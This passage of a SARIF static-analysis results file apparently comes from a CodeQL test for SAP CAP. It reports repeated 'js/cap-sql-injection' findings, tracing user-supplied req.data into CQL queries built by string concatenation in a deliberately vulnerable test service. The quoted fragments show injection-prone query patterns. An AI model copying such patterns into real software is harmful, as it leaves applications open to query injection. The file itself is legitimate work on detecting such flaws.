value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":37,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":38,"startColumn":33,"endColumn":44}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":43,"startColumn":7,"endColumn":45}}}],"partialFingerprints":{"primaryLocationLineHash":"ef21b26f64e7e417:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":42,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":42,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":42,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":43,"startColumn":42,"endColumn":44}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":43,"startColumn":33,"endColumn":44}},"message":{"text":"`ID =` + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":42,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":42,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":43,"startColumn":33,"endColumn":44}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":48,"startColumn":7,"endColumn":44}}}],"partialFingerprints":{"primaryLocationLineHash":"9d03b555ff929ea0:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":47,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":47,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":47,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":48,"startColumn":39,"endColumn":41}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":48,"startColumn":33,"endColumn":43}},"message":{"text":"`ID=${id}`"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":47,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":47,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":48,"startColumn":33,"endColumn":43}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1).\nThis CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":73,"startColumn":7,"endColumn":78}}}],"partialFingerprints":{"primaryLocationLineHash":"b7f3fae4cc5d3224:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":72,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":72,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":72,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":73,"startColumn":49,"endColumn":55}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":73,"startColumn":33,"endColumn":55}},"message":{"text":"\"col1 = ...  amount"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":72,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":72,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":72,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":73,"startColumn":75,"endColumn":77}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":73,"startColumn":63,"endColumn":77}},"message":{"text":"\"col1 = \" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":72,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":72,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":73,"startColumn":33,"endColumn":55}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":73,"startColumn":63,"endColumn":77}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1).\nThis CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":78,"startColumn":7,"endColumn":78}}}],"partialFingerprints":{"primaryLocationLineHash":"6a3ab8595760f6c0:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":77,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":77,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":77,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":78,"startColumn":49,"endColumn":55}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":78,"startColumn":33,"endColumn":55}},"message":{"text":"\"col1 = ...  amount"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":77,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":77,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":77,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":78,"startColumn":75,"endColumn":77}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":78,"startColumn":63,"endColumn":77}},"message":{"text":"`col1 = ` + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":77,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":77,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":78,"startColumn":33,"endColumn":55}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":78,"startColumn":63,"endColumn":77}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1).\nThis CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":83,"startColumn":7,"endColumn":78}}}],"partialFingerprints":{"primaryLocationLineHash":"342691d0eacbdb40:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":82,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":82,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":82,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":83,"startColumn":49,"endColumn":55}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":83,"startColumn":33,"endColumn":55}},"message":{"text":"\"col1 = ...  amount"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":82,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":82,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":82,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":83,"startColumn":73,"endColumn":75}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":83,"startColumn":63,"endColumn":77}},"message":{"text":"`col1 = ${id}`"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":82,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":82,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":83,"startColumn":33,"endColumn":55}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":83,"startColumn":63,"endColumn":77}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":88,"startColumn":7,"endColumn":76}}}],"partialFingerprints":{"primaryLocationLineHash":"e84c1b8cf5608a54:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":87,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":87,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":87,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":88,"startColumn":49,"endColumn":55}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":88,"startColumn":33,"endColumn":55}},"message":{"text":"\"col1 = ...  amount"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":87,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":87,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":88,"startColumn":33,"endColumn":55}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":123,"startColumn":7,"endColumn":47}}}],"partialFingerprints":{"primaryLocationLineHash":"c8e83fb2aff22206:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":122,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":122,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":122,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":123,"startColumn":44,"endColumn":46}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":123,"startColumn":35,"endColumn":46}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":122,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":122,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":123,"startColumn":35,"endColumn":46}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":128,"startColumn":7,"endColumn":47}}}],"partialFingerprints":{"primaryLocationLineHash":"980ed798eb9fd08f:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":127,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":127,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":127,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":128,"startColumn":44,"endColumn":46}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":128,"startColumn":35,"endColumn":46}},"message":{"text":"`ID =` + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":127,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":127,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":128,"startColumn":35,"endColumn":46}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":133,"startColumn":7,"endColumn":48}}}],"partialFingerprints":{"primaryLocationLineHash":"580b744db9ff8fbe:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":132,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":132,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":132,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":133,"startColumn":43,"endColumn":45}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":133,"startColumn":35,"endColumn":47}},"message":{"text":"`ID = ${id}`"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":132,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":132,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":133,"startColumn":35,"endColumn":47}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":145,"startColumn":13,"endColumn":58}}}],"partialFingerprints":{"primaryLocationLineHash":"d28f5758e8f2b020:1","primaryLocationStartColumnFingerprint":"6"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":143,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":143,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":143,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":145,"startColumn":55,"endColumn":57}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":145,"startColumn":47,"endColumn":57}},"message":{"text":"\"ID=\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":145,"startColumn":13,"endColumn":58}},"message":{"text":"SELECT. ... \" + 